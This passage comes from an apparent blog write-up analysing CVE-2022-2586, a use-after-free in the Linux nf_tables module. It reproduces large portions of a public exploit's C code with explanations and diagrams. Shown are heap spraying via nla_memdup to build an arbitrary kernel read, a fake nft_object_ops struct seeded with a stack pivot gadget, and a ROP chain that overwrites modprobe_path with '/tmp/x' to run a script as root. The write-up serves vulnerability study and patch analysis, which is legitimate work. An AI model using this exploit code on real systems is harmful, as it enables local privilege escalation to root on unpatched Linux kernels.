|                          |
+--------------------------+
After UAF Triggering and nft_object Spray:
+--------------------------+
| nft_object structures    |
| (allocated in freed      |
| memory location)         |
+--------------------------+
| ...                      |
|                          |
+--------------------------+
| ctx->table->objects      |
+--------------------------+

The goal is to manipulate memory allocation to reveal information about ctx->table and ctx->table->objects

Phase 3: This phase essentially sets up an arbitrary read primitive and uses it to leak the address of ctx->table->objects.next

/* ===================== [ Phase 3 - ctx->table->objects.next leak ] ===================== */

puts("[i] Phase 3 - ctx->table->objects.next leak");

sleep(1.2);

PHASE_3:

/*
   At this point, we have a known address of an address where we can store contents by
   spraying, which is exactly what we need for a fake nft_object_ops struct residing in
   the kernel heap.
   
   To retrieve this address, we can prepare another UAF condition and take over the
   contents of the nft_object, use nla_memdup() spraying through table creation to
   replace its contents and place in obj->key.name an arbitrary address. This way,
   we get a full arbitrary read primitive, allowing us to read bytes at any known
   valid address. We are, however, a bit limited in that this pointer is treated as
   a string pointer, and we will be able to read until a null terminator is found.
   
   Using this arbitrary read primitive, we will read the contents of &ctx->table->objects
   which is ctx->table->objects.next, and the address contained there is the address of
   one of the nft_objects we used to spray.
*/

sp_d = calloc(0xc8, sizeof(char));
if(!sp_d)
    bye("[-] Error at calloc()");
sp_d_l = (uint64_t *)sp_d;

memset(sp_d, 'A', 0xc8);

/* obj->key-name entry */
sp_d_l[4] = (tbl_leaked_addr + OFF_TO_OBJ_LST) + 1; // "+ 1" because first byte will be null

puts("\t[*] Triggering UAF on nft_object struct...");
create_uaf(TABLE_RD_UAF_A, TABLE_RD_UAF_B, OBJ_RD_UAF, SET_RD_UAF, OBJECT_TYPE_COUNTER, 0, NULL, 0);
delete_table(TABLE_RD_UAF_A);
spray_memdup(sp_d, 0xc8, 2048);

sleep(1);

obj_leaked_addr = parse_uaf_obj_name_leak(TABLE_RD_UAF_B, SET_RD_UAF, 0x40 + 8, 1);
if(obj_leaked_addr == 0 || (obj_leaked_addr & 0xffff000000000000) != 0xffff000000000000) {
    puts("[-] *ctx->table->objects leak failed!");
    goto FINAL_CLEANUP;
}

printf("\t[+] Leaked: ctx->table->objects.next @ 0x%lx\n", obj_leaked_addr);

/* ===================== [ Phase 4 - Craft fake nft_object_ops struct ] ===================== */

puts("[i] Phase 4 - Craft fake nft_object_ops struct");

Memory Allocation: The code allocates a chunk of memory (sp_d) to store contents for the spraying.
Setting Up Arbitrary Read Primitive: The code sets up an arbitrary read primitive by manipulating the sp_d_l array. It sets the obj->key-name entry to an arbitrary address (tbl_leaked_addr + OFF_TO_OBJ_LST + 1), with the + 1 adjustment for the null terminator.
Triggering Use-After-Free (UAF): The code triggers a Use-After-Free condition on the nft_object struct by creating a UAF condition using the create_uaf function and then clean up with delete_table.
Spraying Memory with nla_memdup(): The code sprays memory with the contents of sp_d using the spray_memdup function.
Parsing UAF Object Name Leak: It parses the leaked object’s name parse_uaf_obj_name_leak and checks if the leak was successful. If successful, it prints the leaked address.

+-------------------+
                                        | Phase 3 - UAF     |
                                        | (Arbitrary Read)  |
                                        +-------------------+
                                                    |
                  +---------------------------------+
                  |
        +------------------+
        | Memory Allocation|
        | and Setup of     |
        | Arbitrary Read   |
        +------------------+
                  |
                  |
        +------------------+
        | Triggering UAF   |
        | and Cleaning Up  |
        +------------------+
                  |
                  |
        +------------------+
        | Memory Spraying  |
        | with nla_memdup  |
        +------------------+
                  |
                  |
        +------------------+
        | Parsing UAF Leak |
        | and Verification  |
        +------------------+
                  |
                  V
   +---------------------------------+
   | Print Leaked Address (obj_leaked_addr) |
   +---------------------------------+
   |
   V
+--------------------------+
| Phase 4 - Craft fake nft_object_ops struct |
+--------------------------+

Phase 4: In the 4th phase the developer is freeing previously sprayed nft_object structs by deleting the corresponding table (TABLE_OBJ_SPRAY_A).

PHASE_4:
	/*
	   We know the address of an object for which we can control its contents. We need now
	   to achieve this last by deleting the table where these objects reside, to then spray
	   with nla_memdup() allocations as a result of table creation. This way we can place
	   any contents we want in these objects, and we know for certain one of them will be
	   the one for which we know the address.
	   
	   As a result, we will predict that in a specific known heap address there will be
	   a fake nft_object_ops struct, which we will use in the next phase for obj->ops->eval
	   function pointer hijacking.
	*/
	
	// Print a message indicating the start of Phase 4
	puts("\t[*] Freeing sprayed nft_object structs...");
	
	// Delete the table where the objects reside, creating space for new allocations
	delete_table(TABLE_OBJ_SPRAY_A);
	
	// Allocate memory for spraying with nla_memdup() allocations
	sp2_d = calloc(0xc8, sizeof(char));
	if(!sp2_d)
		bye("[-] Error at calloc()");
	sp2_d_l = (uint64_t *)sp2_d;
	
	// Spray the memory with a stack pivot address (push rdi; pop rsp; add cl, cl; ret)
	for(int i = 0 ; i < (0xc8 / sizeof(uint64_t)) ; i++)
		sp_d_l[i] = stack_pivot_addr; // push rdi ; pop rsp ; add cl, cl ; ret
	
	// Print a message indicating the start of memory spraying
	puts("\t[*] Spraying with nla_memdup() allocations to craft fake nft_object_ops struct...");
	
	// Perform the memory spraying with nla_memdup()
	spray_memdup(sp_d, 0xc8, 4096);
	
	/* Cleanup (from phase 2, 3, 4) */
	
	// Clean up tables used in previous phases
	puts("\t[*] Cleaning up...");
	delete_table(TABLE_RD_UAF_B);
	delete_table(TABLE_HLK_UAF_B);
	
	// Print a message indicating the completion of Phase 4
	puts("\t[+] Fake nft_object_ops struct should be in target memory!");
	
	/* ===================== [ Phase 5 - Code execution ] ===================== */
	
	// Print a message indicating the start of Phase 5
	puts("[i] Phase 5 - Code execution (ROP)");
	
	// Pause for 2 seconds (sleep)
	sleep(2);

New memory (sp2_d) is allocated for the subsequent memory spraying.
The memory is sprayed with a specific stack pivot address, and nla_memdup() allocations are performed, crafting a fake nft_object_ops struct in the process.
Cleanup operations are performed to clean up tables used in previous phases (TABLE_RD_UAF_B and TABLE_HLK_UAF_B).
A message is printed indicating that the fake nft_object_ops struct should now be in the target memory.
The script is then prepared for Phase 5 (Code execution) by printing a message and pausing for 2 seconds.

+-------------------------+             +-------------------------+
|     TABLE_OBJ_SPRAY_A   |             |                         |
|-------------------------|             |                         |
|   nft_object 1          |             |                         |
|   nft_object 2          |             |         Heap            |
|   ...                   |    Phase 4  |                         |
|   nft_object n          |  ---------->|   +-----------------+   |
+-------------------------+             |   |   Fake          |   |
          |                             |   |   nft_object_ops|   |
          |                             |   |   (Crafted)      |  |
          V                             |   +-----------------+   |
          +-------------------------+   |                         |
                                        |                         |
                                        +-------------------------+

Phase 4 involves freeing existing nft_object structs, creating space in the heap, and then spraying memory with a crafted fake nft_object_ops struct. This crafted structure will be utilized in the subsequent Phase 5 for code execution (ROP).

Phase 5: The developer aims to leverage a Use-After-Free (UAF) vulnerability on objects created earlier. They allocate memory for a Return-Oriented Programming (ROP) chain, spray this chain using nla_memdup() allocations, and then trigger a network hook to exploit the UAF condition. The ROP chain is carefully crafted to achieve code execution with elevated privileges, ultimately leading to the execution of a custom script as root.

PHASE_5:
	/*
	   Finally, trigger UAF on the objects created at the very
	   beginning of the exploit.
	*/
	
	// Delete the table used for UAF in the previous phase
	delete_table(TABLE_RP_UAF_A);
	
	// Allocate memory for a ROP chain
	rop_d = calloc(0xc8, sizeof(char));
	if(!rop_d)
		bye("[-] Error at calloc()");
	rop_d_l = (uint64_t *)rop_d;
	
	/*
	   We build a ROP chain in these sprayed nla_memdup()
	   allocations, with the hope that one of them ends up
	   taking the chunk previously used by the nft_object,
	   and for which we still keep a reference.
	   
	   The ROP chain will use a write-what-where gadget to
	   write our custom usermode helper for modprobe_path,
	   allowing us to execute a custom script as root.
	   
	   Finally, we reach the KPTI trampoline for returning
	   to the userland.
	*/

	// Populate the ROP chain with specific values and gadgets
	rop_d_l[0] = pop_rdx_ret; 			// pop rdx ; ret
	rop_d_l[1] = modprobe_path;			// modprobe_path
	rop_d_l[2] = pop_rax_ret;			// pop rax ; ret
	rop_d_l[3] = 0x782f706d742f;			// "/tmp/x\x00\x00"
	rop_d_l[4] = mov_qptr_rdx_rax_ret;		// mov qword ptr [rdx], rax ; ret
	rop_d_l[5] = kpti_trampoline;			// swapgs_restore_regs_and_return_to_usermode + 22
	// ... (continued population of the ROP chain)

	// Spray the ROP chain using nla_memdup() allocations
	puts("\t[*] Spraying with nla_memdup() allocations containing ROP chain...");
	spray_memdup(rop_d, 0xc8, 4096);
	
	// Trigger the network hook to exploit the UAF condition
	puts("\t[*] Triggering network hook...");
	system("ip link set dev lo up");  // Prevent problems with socket creation

	// Set up a server in a new process
	sfd = fork();
	if(sfd == 0) {
		setup_trig_server();
		exit(0);
	}
	
	// Trigger the network hook for the UAF-referenced object
	cfd = fork();
	if(cfd == 0) {
		trig_net_sock();
		exit(0);
	}
	
	// Signal success to the parent process
	is_success = 1;
	r = write(pipefd[1], &is_success, sizeof(int));
	if(r < 0)
		return 1;
	
	sleep(10);
	
	/* ===================== [ Cleanup ] ===================== */

FINAL_CLEANUP:
	kill(cfd, SIGKILL);
	kill(sfd, SIGKILL);
	close(fd);
	delete_table(TABLE_RP_UAF_B);
	cleanup_spray_tables();
	return 0;

Here’s a simplified flow diagram:

+------------------------+
   |    PHASE_5: Exploit    |
   +------------------------+
               |
       +-------v--------+
       |  Delete Table  |
       +-------|--------+
               |
       +-------v--------+
       |  ROP Chain     |
       +-------|--------+
               |
       +-------v--------+
       |  Spray Memory  |
       +-------|--------+
               |
       +-------v--------+
       | Trigger UAF    |
       +-------|--------+
               |
       +-------v--------+
       |   Network      |
       |   Exploitation |
       +-------|--------+
               |
       +-------v--------+
       |   Final         |
       |   Cleanup       |
       +-------|--------+
               |
               v
            [Exit]

Patch Diffing

A change was made to fix a https://github.com/torvalds/linux/commit/95f466d22364a33d183509629d0879885b4f547e in the code.

When looking for chains by ID, use the table that was used for the lookup by name, and only return chains belonging to that same table.

Final Thoughts

Throughout the journey of analyzing the CVE-2022-2586 and addressing the security concern, it has been an illuminating experience. The process of delving into the User-After-Free in reference nft tables, understanding its implications, and applying the necessary fixes has deepened my understanding of nf_tables.ko module and User-After-Free exploitation.

Furthermore, I would like to acknowledge @lockedbyte the remarkable contribution in crafting an exploit for the vulnerability. The exploit has not only provided a practical demonstration of the vulnerability but has also enabled me to test and validate its vulnerability existence.

I trust that reading this account was as delightful for you as it was for me to craft it.

Also, there can be multiple ways to exploit the vulnerability, The exploitation operates under the assumption that a particular address is consistently mapped in the kernel space, though this is not universally guaranteed. Consequently, the exploit’s reliability is not absolute, yet it boasts a commendable success rate. Another challenge lies in the occurrence of a kernel panic upon completion of the exploit. To mitigate this, efforts are underway to identify objects capable of persisting in kernel memory beyond the conclusion of the exploitation process. It requires thorough experimentation with various placements but it’s a worthwhile task to manipulate it.